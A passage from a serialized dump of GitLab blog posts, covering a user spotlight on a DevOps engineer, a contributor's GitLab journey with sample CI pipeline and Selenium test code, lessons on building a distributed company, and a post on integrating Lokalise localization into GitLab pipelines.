Within a few short months, Petersen was so impressed by her GitLab CI/CD experience that she felt the need to shout her newfound “love” for continuous integration and continuous delivery from the virtual mountaintop of [her blog](https://leahnp.github.io/2018/moving-from-jenkins-to-gitlab-CI/).\n\nWe recently met up with Petersen to learn more about her transition to the tech world and experience with GitLab.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/Avx_RftRT_o\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n### Q & A with Leah Petersen, DevOps Engineer\n\n**Where do you work and what does your team do?**\n\nI work for a team in Samsung SDS called the Cloud Native Computing Team, and I'm [a DevOps engineer](https://about.gitlab.com/topics/devops/what-is-a-devops-engineer/). We deal primarily with containers in Kubernetes and helping companies modernize and move to the cloud. My team is super unique. We were kind of treated like an incubated startup within Samsung, so we're really given a lot of autonomy to make our own decisions.\n\nOur team was put together about five years ago, and Samsung really made a bet on Kubernetes being the future of orchestrating huge workloads in the cloud. Initially, we were focusing mainly on research and development, contributing to the Kubernetes community and learning who was a part of it, what their motives were, and how we could find our place in it. Over the last year, Samsung has really pivoted our role in the company, and we're looking at how we can help Samsung as a global organization move to Kubernetes and containers.\n\n**Where did you work before Samsung?**\n\nI was a motorcycle stunt rider before I became an engineer, and that career kind of organically grew out of my passion for motorcycles. 
I started stunting, loved the community and was able to meet people all over the country and travel. Being one of the few women who did it, I organically started getting calls for jobs and gigs. I thought, “If I can do this in my 20s and make this my full-time career, I'm definitely going to take a shot at it,” so I did.\n\nIt was an amazing opportunity and experience to travel the world and meet people all over this planet who are passionate about this crazy thing that I'm also passionate about. And I got to work with a lot of amazing brands and raise awareness about the sport that I love. So, I don't have any regrets about that and cherish the time that I got to spend on a motorcycle professionally.\n\n**How did you move from being a professional motorcycle stunter to a DevOps engineer?**\n\nI had been looking for a new career path and wasn't really sure what I was going to do. I knew that I wanted to build some tangible skills. I wanted skills that had a clear market value, and tech definitely provides that.\n\nI ended up taking an online coding course in Python, and had this “aha” moment where I realized, not only can I do this, which I didn't think was previously possible, but it's fun; I really like solving these problems. At that point I started taking more online courses and learning as much as I could for free. Then I ended up finding [Ada Developers Academy](https://www.adadevelopersacademy.org/), and that was the perfect segue into the industry.\n\n> I had this “aha” moment where I realized, not only can I do this, which I didn't think was previously possible, but it's fun\n\n**Can you describe how your experience has been as a woman in tech?**\n\nYou definitely get a lot of strange reactions being a woman in tech. Walking into a situation, oftentimes people are surprised you're an engineer. 
You'll get reactions like, “Oh, I thought you were a project manager,” or, “I thought you were a recruiter,” or whatever other stereotype that you brought into the room. That can be discouraging and makes you feel unwelcome in that space. But I think we need women in every part of tech: frontend, backend, DevOps, operations, everything. If your interest is in UX, go for that. But don't let all the men who've been in the industry for 25 years on the operations side of things scare you off either. I really think we need diverse minds and approaches to problems in the whole spectrum of it.\n\nSometimes I forget about the gender disparity in tech because my team, specifically, has a couple of really amazing women who I get to work with every day. So, I'm very fortunate. But I recently went to KubeCon in Copenhagen, and it's an amazing conference with so much energy, but it's a real wake up call when you see the gender disparity there. There's 4,000 guys walking around and you feel like you stick out [or] when you're sitting in an auditorium, look around and realize, “Oh, I'm the only lady here.” It's something that you can't look away from.\n\n**Why did you decide to go into DevOps engineering?**\n\nIn my boot camp classes we were focusing on web development and building Ruby on Rails and Node.js apps. We each had an opportunity to do an internship at companies in Seattle that support the Ada program. Samsung was one of them, and they came in to do a presentation about their involvement in open source and Kubernetes. I had no idea what they were talking about, but Kubernetes and the momentum of the open source community was really appealing to me. So I took a chance and picked Samsung, dove right in, and found my way as I went along. I'm really happy that I chose Kubernetes and to specialize in the cloud.\n\n>Kubernetes and the momentum of the open source community was really appealing to me. 
So I took a chance, dove right in, and found my way as I went along\n\n**How did you get started with GitLab CI/CD? And how would you describe your transition to the application?**\n\nI always felt like I was fighting with the CI platform we were on prior to GitLab. It was never really functioning how we wanted it to, and something was always kind of failing. The whole reason you have CI/CD is to get visibility into what's happening with your code, right? You want to run your code through this pipeline and make sure there are no bugs, that you’re packaging it correctly and putting it in the places that you need it to be in production. It's this hugely critical component of going from the developer's computer to the world; that's the pipeline. So you really need the visibility to see what is happening every step of the way.\n\nOn the old system, I felt that I just didn't have that visibility. I was digging for the problems and not able to understand where they were coming from, where they were originating from, why they were happening or how to fix them. I feel like GitLab definitely does a great job of assisting the user in finding the origin of a problem, tracing that step back and making it clear where your issues are and when you're having success.\n\n**How has using GitLab impacted your career and workflow?**\n\nThere's a lot of talk about accessibility and user experience in tech. And we all know what it's like to have a bad user experience with a piece of technology; it's the most frustrating thing in the entire world. As a developer, you deal with lots of different tech every single day. When I started using GitLab about a year and a half into my career, it was certainly the first platform where I was like, ‘I feel so at home here. Everything’s fluid. I can find where everything is. 
I understand what everything is.’ There aren't these big black holes of confusion that have me asking, “Why does this exist and what am I doing here?’”\n\nWith GitLab, everything is just this cheery, happy place. And I really appreciate how it has now set the bar for me when it comes to the way in which a technology should function when I’m working with it.\n\nCover photo by [Rendiansyah Nugroho](https://unsplash.com/photos/JUePy_-uOSI) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1078,1038,845,9,779,267,685,910],{"slug":3620,"featured":6,"template":689},"leah-petersen-user-spotlight","content:en-us:blog:leah-petersen-user-spotlight.yml","Leah Petersen User Spotlight","en-us/blog/leah-petersen-user-spotlight.yml","en-us/blog/leah-petersen-user-spotlight",{"_path":3626,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3627,"content":3633,"config":3638,"_id":3640,"_type":14,"title":3641,"_source":16,"_file":3642,"_stem":3643,"_extension":19},"/en-us/blog/lee-tickett-my-gitlab-journey",{"title":3628,"description":3629,"ogTitle":3628,"ogDescription":3629,"noIndex":6,"ogImage":3630,"ogUrl":3631,"ogSiteName":673,"ogType":674,"canonicalUrls":3631,"schema":3632},"From user, to advocate, to contributor: my GitLab journey","Three years (as a user and as a contributor) with GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681735/Blog/Hero%20Images/cover_photo.jpg","https://about.gitlab.com/blog/lee-tickett-my-gitlab-journey","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"From user, to advocate, to contributor: my GitLab journey\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lee Tickett\"}],\n        \"datePublished\": \"2020-11-13\",\n      }",{"title":3628,"description":3629,"authors":3634,"heroImage":3630,"date":3635,"body":3636,"category":951,"tags":3637},[3284],"2020-11-13","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nI have had a 
passion for technology since before I can remember. Thirteen years ago I took the plunge, quit my day job, and started an IT development and support company called [Tickett Enterprises Limited](https://www.tickett.net). For the last three years, GitLab has been a part of my journey.\n\n## 3 Years Ago \nWe were (and still are) using a helpdesk system we built ourselves. It does exactly what we need it to do - and any time it doesn’t, we change it. The most important feature of the system is reporting. Specifically, facilitating our monthly billing process; with a click of a button, we generate timesheets and invoices for all of our clients.\n\nThough I was aware of Git (and GitHub), I had not heard of GitLab. We were using SVN in its most basic form (single repository for all projects and no branching), with an integration so all commits would create notes in our helpdesk.\n\n## 2.5 Years Ago\nWe decided that SVN was no longer fit for purpose. Our top issues were: \n* never knowing whether the code in our repository matched what was deployed\n* not being able to work collaboratively on projects\n* feature/knowledge limitations\n* Git was the industry standard \n\nWhile most of these issues were due to the way we were using SVN, we were keen to adopt a more popular system. I don’t remember how I found GitLab, but I did, and spun up a local on-prem instance of Community Edition (CE) using separate projects/repositories and basic branching. If you are considering running a local instance, I recommend the [Bitnami appliance/.ova](https://bitnami.com/stack/gitlab).\n\nIt took some time to get used to local vs remote and to remember to push as well as commit, but we picked it up pretty quickly.\n\n## 2 Years Ago\nWe wanted to use GitLab to help us improve our processes so we:\n* built a little UI for project creation (using the GitLab API). 
This ensures new projects fit our naming standards, contain our standard template files, have our standard master/test/dev branches, contain the relevant members, and use our webhooks\n* recreated the helpdesk integration we had with SVN (every commit and comment is replicated as a note on our helpdesk)\n* unaware of GitLab EE, we created a custom merge request approval process using webhooks. Our master branch is always protected - a merge request requires 2 approvals from 2 distinct reviewers (one for code and one for functionality)\n\n## 1.5 Years Ago\nA bit late to the party, but finally we set up the GitLab runner to automate our build, spin up our database, execute our unit tests and report test details and code coverage. GitLab CI for .NET was not as well documented as other use cases leading to a lot of trial and error when setting up the runner.\n\nWe are using the Windows runner configured to use a standard shell (which I think is no longer supported). We will either be moving to powershell on windows or possibly using docker images. 
Here’s a sample .gitlab-ci.yml\n\n```yml\nstages:\n  - build\n  - test\n\nvariables:\n  CI_DEBUG_TRACE: \"false\"\n  ASSEMBLY_VERSION: \"1.0.4\"\n  \nbuild:\n stage: build\n script:\n  - 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nuget restore'\n  - '\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\BuildTools\\MSBuild\\15.0\\bin\\msbuild\" /t:Restore,Clean,ReBuild /t:Database:Publish /p:Configuration=Debug;Platform=\"Any CPU\" /p:SqlPublishProfilePath=Database.publish.xml'\n  - 'ping 192.168.99.99 -n 1 -w 10000 2>nul || type nul>nul'\n artifacts:\n  paths:\n   - Tests/bin/\n\ntest:\n stage: test\n script:\n  - 'c:\\GitLab-Runner\\opencover\\OpenCover.Console.exe -returntargetcode:1000 -filter:\"+[*]* -[nunit*]* -[*Tests*]*\" -register -target:\"C:\\Program Files (x86)\\NUnit.org\\nunit-console\\nunit3-console.exe\" -targetargs:\"Tests\\Tests.csproj --result=testresult.xml;transform=C:\\gitlab-runner\\nunit3-junit.xslt\"'\n coverage: '/^Visited Branches .*(\\(\\d+\\.?\\d*\\))/'\n dependencies:\n  - build\n artifacts:\n  reports:\n   junit: testresult.xml\n```\n\nWe were building another customization to allow us to search for code across all repositories. Unfortunately, we hit a limitation because the API did not allow searching anything but the default branch.\n\nAt this point, while Googling for help getting CI up and running, I learned that GitLab is open-source. So I thought maybe I could extend the API to support searching any branch. This led to [my first contribution](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/28069).\n\n## 1 Year Ago\nAt this point, I was completely new to all of the technologies, techniques, and best practices used by GitLab but found myself participating in my first [GitLab hackathon](https://about.gitlab.com/community/hackathon/). Somehow, I managed to take joint first prize!\n\nMy first few contributions were achieved by modifying my production GitLab installation (not ideal). 
So it was time to get the [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit) up and running. This was certainly not without its challenges (many of which I suspect stem from me being in the minority of GitLab contributors running Windows).\n\nI have since contributed to the [GDK project](https://gitlab.com/gitlab-org/gitlab-development-kit) and joined the GDK office hour calls to help shape the way forward and resolve some of the problems and frustrations.\n\nAt this point, I was learning a lot. Not just about the tools and languages but about the best practices and work ethos within the GitLab team. Better yet, I was able to start taking some of these learnings back to the office.\n\n## 0.5 Years Ago\nI attended GitLab Commit - London 2019. This really helped to confirm my suspicions; we are only scraping the surface of GitLab's capabilities.\n\nOn a few occasions, I wondered whether GitLab may not be a good fit for my company as I watched huge companies like Porsche and Goldman Sachs present. A [presentation](https://www.youtube.com/watch?v=t0Eh1sq9r5s) by Huss El-Sheikh from startup 9fin helped ease my concerns.\n\nAround this time, I moved from Windows to Ubuntu to make it easier to work with GDK.\n\nI continued to learn a lot from my contributions, feedback, and interactions with the GitLab team, again applying what I could back in the office. Much around the languages/technologies I hadn’t previously worked with (namely ruby, postgres and vue), but also other takeaways such as:\n* when carrying out code reviews ask questions rather than give instructions (“what do you think about x?” is more productive than “change this to y”)\n* GitLab CI is capable of automating a lot of what we currently do by hand (e.g. code review for best practices)\n* always try to add tests when making code changes\n\nI am a firm believer of documenting processes, decisions, and rationale. 
There’s nothing worse than someone saying “we do it this way” without being able to back that up with reasoning. With that in mind, we implemented Merge Request Templates to ensure our team was consistent in our approach to coding, testing, and releasing.\n\nBy now our development team had plenty of experience with GitLab and we were starting to move our support team over. To help our team leads monitor merge requests, we adopted 2 simple departmental labels (`Support`/`Development`) and used our webhook engine to ensure every MR is automatically labelled.\n\n## Today / What’s Next\nIn preparation for a transition to .NET core, deprecation of the Windows shell runner and a desire to start testing our frontend (web), I started putting a CI script together using docker and the mcr.microsoft.com/dotnet/core/sdk:latest image. The .gitlab-ci.yml looks like;\n\n```yml\nstages:  \n  - build\n  - test\n\nvariables:\n  CI_DEBUG_TRACE: \"false\"\n  ASSEMBLY_VERSION: \"1.0.1\"\n\nbuild:\n stage: build\n tags:\n  - docker\n script:\n  - 'dotnet build'\n\ntest:\n stage: test\n tags:\n  - docker\n script:\n  - 'nohup dotnet run --project Web &'\n  - 'apt-get update'\n  - 'apt-get install -y unzip'\n  - 'wget https://chromedriver.storage.googleapis.com/83.0.4103.14/chromedriver_linux64.zip'\n  - 'unzip chromedriver_linux64.zip -d ~/'\n  - 'rm chromedriver_linux64.zip'\n  - 'mv -f ~/chromedriver /usr/local/bin/chromedriver'\n  - 'chown root:root /usr/local/bin/chromedriver'\n  - 'chmod 0755 /usr/local/bin/chromedriver'\n  - 'wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -'\n  - 'sh -c ''echo \"deb https://dl.google.com/linux/chrome/deb/ stable main\" >> /etc/apt/sources.list.d/google.list'''\n  - 'apt-get update'\n  - 'apt-get install -y google-chrome-stable'\n  - 'dotnet test -l:trx Tests/Tests.csproj /p:CollectCoverage=true'\n coverage: '/Total\\s*\\|.*\\|\\s(\\d+\\.?\\d*)%\\s*\\|.*\\|/'\n```\n\nAnd the tests look something like;\n\n```c#\n    
public class UiTests : IDisposable\n    {\n        private readonly Process _webServerProcess;\n        private readonly IWebDriver _driver;\n\n        [Fact]\n        public void ClickNavPrivacyPolicy()\n        {\n            _driver.Navigate()\n                .GoToUrl(\"http://localhost:5000/\");\n\n            var link = _driver.FindElement(By.LinkText(\"Privacy\"));\n            link.Click();\n\n            Assert.Equal(\"http://localhost:5000/Home/Privacy\", _driver.Url);\n        }\n\n        public UiTests()\n        {\n            ChromeOptions chromeOptions = new ChromeOptions();\n            chromeOptions.AddArguments(\"headless\", \"no-sandbox\");\n            _driver = new ChromeDriver(chromeOptions);\n\n            if (RuntimeInformation.IsOSPlatform(OSPlatform.Linux)) return;\n\n            _webServerProcess = new Process\n            {\n                StartInfo = {\n                    WorkingDirectory = Path.Combine(System.AppDomain.CurrentDomain.BaseDirectory, \"..\", \"..\", \"..\", \"..\", \"Web\"),\n                    FileName = $\"dotnet.exe\",\n                    Arguments = \" run\",\n                    UseShellExecute = true,\n                }\n            };\n            _webServerProcess.Start();\n        }\n\n        private void KillWebServer()\n        {\n            if (_webServerProcess != null && !_webServerProcess.HasExited)\n            {\n                _webServerProcess.Kill();\n            }\n        }\n\n        public void Dispose()\n        {\n            _driver.Dispose();\n            KillWebServer();\n        }\n    }\n```\n\nYou can see some conditional code in there which allows Selenium tests to work both locally on our development machines and remotely on our GitLab runner. If you have a better way of achieving this, please leave a comment. 
I would love to chat and learn!\n\nI also want to start introducing some linting like we see in the GitLab project to enforce rules around code formatting (spaces, carriage returns, indentation, etc.). I have started to look at JetBrains Resharper (R#) command-line but haven’t had enough time to implement it yet. Ideally, I would like to start with just a rule or two and then slowly introduce more, but it looks quite tricky to take this approach. Please let me know if you’ve been able to achieve this!\n\nI would also like to lose our helpdesk and start using GitLab issues, service desk, timelogs, etc. I am working on identifying the gaps and working with the product managers to understand whether it is realistic to fill those gaps within the GitLab product. Alternatively, I will be looking to build some additional “bolt-ons” using webhooks and the API.\n\nWhile investigating gaps, I stumbled upon the [GitLab-Triage project](https://gitlab.com/gitlab-org/gitlab-triage) and I expect we'll use this to automate various workflows. I managed to help close a few issues and even create a few additional features which would make it work for us by [contributing to the GitLab-Triage project](https://gitlab.com/gitlab-org/gitlab-triage/-/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&author_username=leetickett).\n\nWe also added more labels (`needs code review` & `needs functional review`) for our merge request approval process now. We can see where we are and what needs to be done at a glance. We previously relied on an MR checklist that we are deprecating.\n\n![Merge request checklist](https://about.gitlab.com/images/blogimages/lee-tickett-my-gitlab-journey/mr_checklist.png)\n\n![Merge requests with labels](https://about.gitlab.com/images/blogimages/lee-tickett-my-gitlab-journey/merge_requests_with_labels.png)\n\n## Contributing to GitLab \n\nI am very proud to have joined the GitLab Core Team. 
Thanks to everyone who has held my hand and patiently assisted me with contributions. \n\nWith the release of Microsoft Windows Subsystem for Linux v2, I have gone back to running Windows on my laptop with GDK running in Ubuntu on WSL2. This is working brilliantly for me at the moment (the way Visual Studio Code handles things especially is really cool).\n\nI now have 95 [merged merge requests!](https://gitlab.com/dashboard/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&author_username=leetickett) and have been helping several others get started contributing (getting GDK up and running etc). Once this crazy pandemic is over and we can start to socialise again, I would like to try and start some sort of local meetup/group.\n\nI would like to help make it easier to connect GitLab users. I have visions of a mechanism to search for others based on:\n* the size of their user base \n* the languages they are using\n* the feature they are using\n\nAt present, we have several tools (Gitter, Issues, Forum etc) but there is a strong reliance on being engaged and stumbling on questions/support requests. I suspect many of us would be happy to have other users reach out directly.\n\nIf you need any more information around:\n* getting your development environment/tools setup on Windows 10\n* getting CI working with .NET and SQL Server projects\n* building customisations using GitLab webhooks and API\n\n...or would like to see a demo of anything discussed above, I would be happy to oblige!\n\nI would love to connect with others who are either looking to, or already using GitLab for:\n* .NET projects\n* customer helpdesk \n* customer billing (using timelogs)\n\nThanks for reading! 
Here's a picture of me and the family repping with our GitLab merch!\n\n![The tickett family repping GitLab](https://about.gitlab.com/images/blogimages/lee-tickett-my-gitlab-journey/landing_page.png)\n",[109,267,910,686,9,685,779],{"slug":3639,"featured":6,"template":689},"lee-tickett-my-gitlab-journey","content:en-us:blog:lee-tickett-my-gitlab-journey.yml","Lee Tickett My Gitlab Journey","en-us/blog/lee-tickett-my-gitlab-journey.yml","en-us/blog/lee-tickett-my-gitlab-journey",{"_path":3645,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3646,"content":3652,"config":3658,"_id":3660,"_type":14,"title":3661,"_source":16,"_file":3662,"_stem":3663,"_extension":19},"/en-us/blog/lessons-on-building-a-distributed-company",{"title":3647,"description":3648,"ogTitle":3647,"ogDescription":3648,"noIndex":6,"ogImage":3649,"ogUrl":3650,"ogSiteName":673,"ogType":674,"canonicalUrls":3650,"schema":3651},"9 Lessons on building a distributed company","GitLab CEO Sid Sijbrandij and Outklip Founder Sunil Kowlgi talk about remote hiring, management, customer support, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678641/Blog/Hero%20Images/lessons-building-distributed-company.jpg","https://about.gitlab.com/blog/lessons-on-building-a-distributed-company","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"9 Lessons on building a distributed company\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sunil Kowlgi\"}],\n        \"datePublished\": \"2019-04-18\",\n      }",{"title":3647,"description":3648,"authors":3653,"heroImage":3649,"date":3655,"body":3656,"category":2074,"tags":3657},[3654],"Sunil Kowlgi","2019-04-18","\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or a discussion of other things related to 
GitLab._\n\nIt is far easier to run an all-remote company than one that’s a hybrid of remote and colocated,\nsays [Sid Sijbrandij](/company/team/#sytses). When a company adopts a colocated\nculture there’s less recording of things and fewer digital artifacts, so it’s going to be hard for\nthe rest of the company to figure out how decisions are made.\n\nI interviewed Sid for lessons on building a distributed company like GitLab. Sid answered\nquestions on topics ranging from hiring to customer support.\n\nMy top takeaways from the interview:\n\n### 1. Remote interviews are more convenient than in-person interviews\n\nDuring an in-person interview, you need to make sure all your interview materials are loaded\nbeforehand on your laptop or iPad. It’s also going to be hard navigating things on your computer\nwhile talking to a person in front of you. You might write down notes that you’ll need to\ndigitize later by scanning, which is redundant work. On the other hand, when interviewing\nsomeone remotely over a video conference, you have all the materials at hand.\nBecause you’re looking at a screen you can look up information online and quickly take notes without interruption.\n\n### 2. Spend more time on the candidate’s questions than on your questions\n\nDuring interviews, you can get a lot of information about the candidate from the questions\nthey come prepared with and their follow-on questions. When Sid interviews, he spends most of the interview on the candidate’s questions.\n\n### 3. It is really important to write things down\n\nPeople are very efficient at reading things. If you write something down you can refer to it,\nso you don’t have to say everything again. In order to have alignment in a distributed company,\nrepetition of goals and strategy is needed. Repetition is easier when you have one writeup and people are able to easily find it.\n\n### 4. 
Google Docs is superior to a whiteboard\n\nIt is quite common to have meetings where everyone is looking at the same thing.\nBut, because of time zone differences, it’s hard to involve everyone in a meeting.\nWhile whiteboards are commonly used in in-person meetings, they’re not missed that much by remote workers.\nGoogle Docs is superior to a whiteboard because you never run out of space, you can use\nnumbered lists and indentation, and people can view them afterwards.\n\n### 5. Cross-functional teams don’t work well\n\nGitLab doesn’t do cross-functional teams. Teams are composed of people that perform a similar role.\nA team manager is someone who has experience with that role. This way the manager is able\nto assess results, coach, and give career advice, which is very important.\n\n### 6. Focus on the output of employees, not the input\n\nGood remote workers are focused on results. Especially for managers, it’s important that they\ndon’t focus on the input of people – how long they worked or things like that – but rather focus on the output.\nFocus on the input is not healthy in any company, but especially with remote work you have to let it go.\nNo one’s looking over your shoulder to check whether you’re on Facebook or not, and it’s fine if you\nare as long as you deliver the work to a reasonable degree.\n\n### 7. To be a good manager, you have to quickly identify and remedy underperformance\n\nGitLab hires people who are capable of being [managers of one](https://handbook.gitlab.com/handbook/values/#managers-of-one). But in instances where someone\nis underperforming, managers have to identify it, have a conversation, and take remedial action.\nHere’s [GitLab’s process for dealing with underperformance](/handbook/leadership/underperformance/).\n\n### 8. Be quick with recognition\n\nGitLab has various kinds of employee recognition. For quick recognition, there’s a #thanks\nchannel on Slack where people can celebrate their colleagues’ work. 
There are also $1,000\ndiscretionary bonuses and GitLab tends to be very high velocity with those.\nRecognizing employees and doing it quickly is really important.\n\n### 9. Put customer-reported issues on a level playing field with internally reported issues\n\nThe issue tracking process in GitLab doesn’t distinguish whether the issue reporter is a user,\n a customer, or a team member. If an issue comes from a user or customer, it’s probably\nbecause they care a lot about what you’re building. So, every feature request, everything\nGitLab team-members work on is out there on a level playing field. GitLab tends to have a lot more\ninteraction with customers than other companies.\n\nWatch the full interview below:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/pDU8lxh1-6U\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n[Visit this page to read the transcript of the interview](https://outklip.com/blog/gitlab-building-a-distributed-company/).\n\n### About the guest author\n\nSunil Kowlgi is the founder of [Outklip](https://outklip.com), a video platform for remote work.\n\nPhoto by [Brett Zeck](https://unsplash.com/photos/eyfMgGvo9PA?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/globe?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[803,9,2660,888],{"slug":3659,"featured":6,"template":689},"lessons-on-building-a-distributed-company","content:en-us:blog:lessons-on-building-a-distributed-company.yml","Lessons On Building A Distributed 
Company","en-us/blog/lessons-on-building-a-distributed-company.yml","en-us/blog/lessons-on-building-a-distributed-company",{"_path":3665,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3666,"content":3672,"config":3678,"_id":3680,"_type":14,"title":3681,"_source":16,"_file":3682,"_stem":3683,"_extension":19},"/en-us/blog/lessons-weet-learned-lokalise",{"title":3667,"description":3668,"ogTitle":3667,"ogDescription":3668,"noIndex":6,"ogImage":3669,"ogUrl":3670,"ogSiteName":673,"ogType":674,"canonicalUrls":3670,"schema":3671},"How Weet integrates localization into the GitLab pipeline with Lokalise","Localization is an increasingly important option for users. Here's how to integrate localization in your GitLab pipeline.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668543/Blog/Hero%20Images/lokalise_cover.png","https://about.gitlab.com/blog/lessons-weet-learned-lokalise","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How Weet integrates localization into the GitLab pipeline with Lokalise\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Alexander Pereverzevs\"}],\n        \"datePublished\": \"2021-09-13\",\n      }",{"title":3667,"description":3668,"authors":3673,"heroImage":3669,"date":3675,"body":3676,"category":1119,"tags":3677},[3674],"Alexander Pereverzevs","2021-09-13","\n\nAs a GitLab customer, Weet has fully invested in the premise of \"Iterate faster, innovate together.\" Weet has a low tolerance for processes that don't keep pace with the way they develop and launch. One important process that was slowing the business down – localizing their app.\n\nLocalization is a key way to drive growth and accelerate product adoption. When done poorly, localization or l10n, as it's commonly known, can slow down your development process, introduce bugs, and make it cumbersome to launch updates. 
When done right, teams can smooth out the process and [continuously localize](https://lokalise.com/features/localization-process-automation) their app. We unpack how Weet conquered its localization problems using GitLab and Lokalise.\n\n## What is Weet?\n\n[Weet](https://beeweet.com) is an asynchronous video communication tool designed to reduce the need for meetings. By combining video, audio, and screen sharing, it provides the nuance that written communication simply does not. For example, Weet's 10-person team, which is spread between France and the US, uses the product to speed through code reviews. The product has also been used for demos, design feedback, bug reports, QA reviews, and client presentations. At Lokalise, we use the tool to communicate with team members across time zones with ease and clarity.\n\nWeet started using GitLab five years ago and is using the latest version (13.11 as of this writing). For the runner they use 13.11 too, with an auto-scalable configuration (best feature ever!). The instance is self-managed on Google Cloud.\n\nWeet uses roughly 50 pipelines to manage processes such as: building the entire stack of the Weet application, checking the unit tests, deploying to a QA environment, deploying in production, launching the end-to-end tests, and more. The company currently has 17 projects set up, which are combined with GitLab CI/CD to deploy the Weet application.\n\nThey are, in summary... GitLab fans.\n\n## The first l10n solution\n\nWhen Weet first started localizing their app the engineering team considered two options:\n\n1. Download CSV files of strings, email them to the translators, and then reintegrate the data after the translation work was complete\n2. Translate directly in the IDE\n\nBoth options had their drawbacks. Downloading and uploading files takes developers out of the flow, but worse than that, the process can introduce l10n bugs that make the app look unreliable or amateurish. 
Also, these problems take time to resolve. It's not uncommon for version control to be an issue with this type of system.\n\nWeet chose the Web IDE option because it was easier to get started, but the process wasn't working at the pace they wanted.\n\n>> \"Before we used the Lokalise integration, we had to validate the new wording before each code push. The process was time-consuming as approvers were spread across different time zones,\" - Geraud Bonou-Selegbe, Full-stack engineer at Weet.\n\nHunting through the code to change all the instances of a word that needs to be replaced is not high on anyone's list of fun things to do.\n\nIt wasn't long before Jeremy Rouet, the CTO and co-founder of Weet, started looking for new options. If they wanted to fulfill the CI/CD promise of GitLab, they needed a tool that would integrate cleanly into the pipeline. Jeremy began testing translation management systems (TMS) and settled on integrating [Lokalise with GitLab](https://docs.lokalise.com/en/articles/1789855-gitlab).\n\n## How to continuously localize your product\n\nLokalise integrates into GitLab and allows a user (like Weet) to pull files into Lokalise, where translation tasks can be assigned and completed and then easily merged back.\n\n![Schema of how Lokalise works in GitLab](https://about.gitlab.com/images/blogimages/lokalize1.png){: .shadow.medium.center}\nA schema of how Lokalise works in GitLab.\n{: .note.text-center}\n\nDevelopers code as normal aiming to complete their work prior to each weekly release. Each push on master sends text strings automatically into Lokalise. Lokalise detects any changes to the text, so the developers don't have to remember what exactly they changed. 
Jeremy then uses the task features in Lokalise to assign the translation tasks to the Weet marketing team, who then go in and check all the new words.\n\nOnce the translation team is done, they create a merge request, and the product is ready to launch.\n\n>> \"Lokalise enabled us to bridge this gap by letting developers do what they do the best: coding. If my phrasing is not perfect, language experts can review it on Lokalise and then send a merge request with their updates. Now we've got the right expert in the right place for each milestone of our development process,\" says Geraud.\n\n![Lokalise Merge Request in GitLab](https://about.gitlab.com/images/blogimages/lokalize2.png){: .shadow.medium.center}\nWhat a merge request looks like using Lokalise and GitLab.\n{: .note.text-center}\n\nGone are the days of manually updating translations in the IDE in order to fix phrasing. Now app localization is a seamless and reliable part of the development workflow of the CI/CD process that is built around GitLab.\n\n## Steps to set up the integration\n\nFull instructions are available here. With over 500 keys in the app, the Weet team created several internal processes to keep their work tidy.\nOne move they made was to split their localization data into 5 projects/files. Each localization is a .json file. The separate files are:\n\n- emails\n- frontend\n- integration\n- server-side rendering\n- mobile – iOS/Android (WIP)\n\nThen to simplify key maintenance they used a naming pattern so that each component has its own keys. When they delete a component, they simply remove the main key from the localization file, which removes each label for this component. See below:\n\n![Deleting a component and removing main key from the localization file](https://about.gitlab.com/images/blogimages/lokalize3.png){: .shadow.medium.center}\nHow to delete a component and remove the main key from the localization file.\n{: .note.text-center}\n\nFinally, they tackled conflicts. 
The developers are able to edit the localization files both in Lokalise and in their environment. Changes in multiple systems could clash. To solve this problem, they decided that developers can only use Lokalise to update labels and they can only add or remove keys in their local environment.\n\n## What localization delivers\n\nIt took the Weet team some time and trial and error to smooth out the process.\n\nNow that the process is totally seamless, they can localize a new release in less than an hour with just a short quality check. That’s a big improvement from the days when they had to synchronize the dev, PO, and QA teams over a few days, to check and correct the new localization.\n\nWith their ability to continuously localize their app, they can focus on developing and delivering the best product possible. And it seems to be working as they were recently voted the #2 (closed) product of the week on Product Hunt. Coming up on the roadmap – mobile apps and more languages.\n",[779,231,9],{"slug":3679,"featured":6,"template":689},"lessons-weet-learned-lokalise","content:en-us:blog:lessons-weet-learned-lokalise.yml","Lessons Weet Learned 